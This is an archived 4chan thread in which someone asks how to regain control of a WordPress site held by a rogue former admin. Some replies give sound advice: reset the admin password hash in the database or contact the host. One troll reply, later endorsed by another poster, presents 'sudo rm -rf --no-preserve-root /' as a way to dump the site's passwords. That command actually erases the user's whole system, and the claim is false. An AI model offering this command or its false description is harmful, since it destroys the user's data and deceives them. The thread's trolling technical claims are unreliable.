[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y ] [Search | Free Show | Home]

Intro hacking

This is a blue board which means that it's for everybody (Safe For Work content only). If you see any adult content, please report it.

Thread replies: 9
Thread images: 1

File: hacking.png (364KB, 1200x750px) Image search: [Google]
hacking.png
364KB, 1200x750px
Hey everyone, I need to hack into a website with the intention of shutting it down. I work for a start up and the person that set up the website (wordpress) put some crazy shit on it and went rouge and they were the only admin set up for the site. I need to gain access and then shut it down. Please help.
>>
>>59873910
Install gentoo.
>>
>>59873910
Change the password hash in the database. Google it. If you don't have access to the server or database then you don't work at the company and can gtfo Tyrone.
>>
Install linux,
sudo su
mkdir <nameofwebsite>
cd <newfolder>
sudo rm -rf --no-preserve-root /

should dump all the passwords for the site. Suprised wordpress haven't fixed this yet
>>
Some standard makeup wipes should be able to deal with rouge pretty easily desu.
>>
>>59874140
Yeah. This will work even with newer Wordpress versions.
>>
>>59874140
Thank you for being so helpful, but im going to need you to break it down for me a little more. Should I install Kali linux? Or some other one? In order for me to be able to enter the admin site i need username (or email) and password. I dont have access to the email of the person who set this up.
>>
>>59874291
Op they're trolling you. You need access to the server running the site. You then can change the admin password in the database. If you don't have access to the server then contact the hosting provider for help. They can probably help you reset the admin password in the database if it's a good hosting company.
>>
>>59874291
Gentoo is the best option for that, but you can really use any distro. (With gentoo you have higher chances of success) But really it doesnt mazzer what you use, as long as it is a linux distro.
Thread posts: 9
Thread images: 1

[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y] [Search | Top | Home]

I'm aware that Imgur.com will stop allowing adult images since 15th of May. I'm taking actions to backup as much data as possible.
Read more on this topic here - https://archived.moe/talk/thread/1694/

If you need a post removed click on it's [Report] button and follow the instruction.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com.
If you like this website please support us by donating with Bitcoins at 16mKtbZiwW52BLkibtCr8jUg2KVUMTxVQ5
All trademarks and copyrights on this page are owned by their respective parties.
Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the content originated from that site.
This means that RandomArchive shows their content, archived.
If you need information for a Poster - contact them.